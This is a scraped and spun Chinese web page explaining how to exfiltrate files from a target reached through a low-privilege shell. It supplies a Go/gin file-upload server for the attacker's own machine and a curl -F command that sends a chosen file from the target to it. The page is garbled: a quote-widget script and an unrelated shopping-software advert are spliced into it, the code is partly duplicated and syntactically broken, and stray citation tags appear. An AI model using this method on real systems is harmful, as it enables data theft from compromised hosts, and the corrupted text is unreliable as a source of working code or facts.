在处理低权限shell回传文件的问题时,如果无法使用scp命令且无法安装sshpass,可以考虑使用curl命令进行文件传输。以下是详细的伪原创内容:
至少我们曾经在一起过。
来自:一言
var xhr = new XMLHttpRequest();
xhr.open('get', 'https://v1.hitokoto.cn/');
xhr.onreadystatechange = function () {
if (xhr.readyState === 4) {
var data = JSON.parse(xhr.responseText);
var hitokoto = document.getElementById('hitokoto');
hitokoto.innerText = data.hitokoto;
}
}
xhr.send();在当前情境下,我们面临一个低权限的shell[aru_17],而目标网站没有web服务。此外,scp命令由于权限不足(需要密码验证)无法使用[aru_28]。虽然网上建议使用sshpass来执行带密码的scp命令,但由于当前权限无法安装该工具[aru_28],因此在大表哥的指导下,我们可以利用curl命令进行文件回传[aru_21]。
条件:
- 一台服务器(这是必需的[aru_13])
- 目标服务器能够执行curl命令。
方法:
-
使用Golang编写一个简单的文件上传后端。选择Golang是因为它可以避免安装环境等复杂操作,当然也可以使用其他编程语言[aru_62]。
点击查看后端源码
main.go文件
小生淘宝客程序打折程序下载淘宝客打折系统,集成了jssdk模块,增加了seo优化功能,更有利于搜索引擎收录 1程序上传到服务器空间 2开启服务器 3打开安装地址:http://您的域名/install.php 4如果不能安装请确保数据库里的表全部删除 5进入后台地址:http://您的域名/main.php 默认用户名和密码都是admin 6测试数据时可以导入 test文件夹里的test.sql文件 到数据库,或者
package main
import ( "flag" "go-upload/runserver" )
func main() { filedir := flag.String("f", "", "保存路径") lport := flag.String("p", "8088", "运行端口") flag.Parse() if filedir != "" && lport != "" { runserver.Runserver(filedir, lport) } else { flag.Usage() } }
root.go文件
package runserver
import ( "fmt" "github.com/gin-gonic/gin" "net/http" )
/** @Author: A
- @Date: 2021/7/6 11:32
/
func Runserver(filedir string, lport string) {
r := gin.Default()
b := filedir
r.POST("/upload", func(c gin.Context) {
file, err := c.FormFile("file")
//fmt.Println(file.Filename)
s := b + "/" + file.Filename
if err != nil {
c.String(500, "err")
}
// c.JSON(200, gin.H{"message": file.Header.Context})
err = c.SaveUploadedFile(file, s)
if err != nil {
c.String(http.StatusOK, "err")
}
c.String(http.StatusOK, "ok")
})
r.Run(":" + lport)
}

-
curl命令参数(根据环境进行调整)
curl -F "file=@文件路径" https://www.php.cn/link/d7ee21eda04855ea84c497c61337e896
上传成功会回显ok

提供的源码可以直接下载,如果不想自己编译,可以下载已编译好的Windows和Linux 64位运行程序。
蓝奏云
- @Date: 2021/7/6 11:32
/
func Runserver(filedir string, lport string) {
r := gin.Default()
b := filedir
r.POST("/upload", func(c gin.Context) {
file, err := c.FormFile("file")
//fmt.Println(file.Filename)
s := b + "/" + file.Filename
if err != nil {
c.String(500, "err")
}
// c.JSON(200, gin.H{"message": file.Header.Context})
err = c.SaveUploadedFile(file, s)
if err != nil {
c.String(http.StatusOK, "err")
}
c.String(http.StatusOK, "ok")
})
r.Run(":" + lport)
}









